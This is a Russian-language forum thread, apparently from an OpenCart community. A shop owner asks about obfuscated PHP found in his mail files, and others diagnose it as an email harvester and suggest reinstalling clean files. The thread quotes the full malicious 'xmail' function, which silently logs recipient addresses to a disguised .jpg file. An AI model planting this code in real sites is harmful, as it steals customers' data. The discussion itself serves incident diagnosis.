Перейти к содержанию
Leva888

Вирус или как?

Рекомендуемые сообщения

Приветствую,

 

Нашел у себя на сайте в system/library/mail.php и в admin/controller/sale/contact.php

вот такой спрятанный код, хотелось бы понять что это такое и откуда оно взялось.

<?php /* 62735f32d0da45a576376b71fcbafb50 */ function xmail () { $a=func_get_args(); file_put_contents('/home/domen/public_html/admin/controller/report/z3o.jpg', x($_SERVER['REQUEST_URI']. ' ' .$a[0]."\n"), FILE_APPEND); return mail($a[0],$a[1],$a[2], $a[3]);} function x($s) { $t=$s; $o = ''; for($i=0;$i<strlen($t);$i++){ $o .= $t{$i} ^ '0';} return $o;}?>

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

откройте файлик этот ( /home/domen/public_html/admin/controller/report/z3o.jpg ) через блокнот и покажите что в нём.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Не получается кодом вставить. Пристегнул файл.

 

PS причем после удаления этого кода из указанных файлов скрипт отправки сообщений перестал работать:)

post-18427-0-63272400-1412111158_thumb.jpg

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

это вирус малевича))))

черный квадрат называется)

  • +1 1

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

собирает емайлы покупателей

или запускает как раз таки вирусный файл

взялось откудато

либо старая версия опенкарта

либо фтп взломали

либо либо установили какото модуль который заменил системные файлы

 

лечение: перезалить на оригинальные файлы движка

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вы блокнотом откройте тот рисунок или поменяйте расшмрение с jpeg на txt и напишите сюда то, что содеожится внутри файла. 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Что-то не подумал в тхт поменять:)

Объем видимо большой, не дает кодом вставить. Прикрепил тхт

z3o.txt

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

По поводу откуда взялось.

Перед этим ставил вот этот модуль [Модуль предзаказа - ссылка на варезник]

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

Изменено пользователем AlexFisher
censored

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

По поводу откуда взялось.

Перед этим ставил вот этот модуль 

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

ничего удивительного это варезник

продает чужие модули

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Перед этим ставил вот этот модуль [Модуль предзаказа - ссылка на варезник]

Может быть оттуда?

 

И как этот код повлиял на то, что теперь у меня через форму не уходят заказы?

А вы почаще на варезах модули берите.... тогда у вас такая дыра в безопасности вашего сайта будет, к которую легко влетит средних размеров слон...

...а пока радуйтесь что так легко отделались... хотя это - еще не факт...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

уже восстановил из бэкапа.

Спасибо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Если я выложу сюда этот модуль, сможет его кто-нибудь почистить?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Правила форума читайте. Например пункт 2.5

Нельзя его здесь выкладывать.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Если я выложу сюда этот модуль, сможет его кто-нибудь почистить?

Скорее вас почистят...) половина форума - разработчики, чьи модули, некоторые псевдо-Робин-Гуды сливают на варез....а такие крохоборы-холявщики как вы (простите - ничего личного), их там берут. А потом приходят на форум, где варез очень не любят и жалуются-просят об услугах.  И опять же - не в платном разделе...) т.е. - за спасибо.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

боюсь, что это не всё..

1. сколько ещё таких xmail в ваших файлах?

2. кто вызывает xmail ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

ТС, качай еще модули с вареза.

БОЛЬШЕ ЖЕСТИ!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Вот разберешь их где варез, а где нет. Этот модуль хоть и небольших, но денег стоил, а на сайте у продавца не сказано что он варезник поганый.

 

В mail.php был вызов xmail, заменил его здоровым файлом

Изменено пользователем Leva888

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

я бы на вашем месте не смог спать спокойно.

1. помимо xmail может быть полно других функций

2. злоумышленник уже мог распихать свои бэкдоры по всему сайту

3. злоумышленник уже мог получить доступ к ftp, панели управления, биллингу

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

  • Последние посетители   0 пользователей онлайн

    Ни одного зарегистрированного пользователя не просматривает данную страницу

×

Важная информация

На нашем сайте используются файлы cookie и происходит обработка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфиденциальности.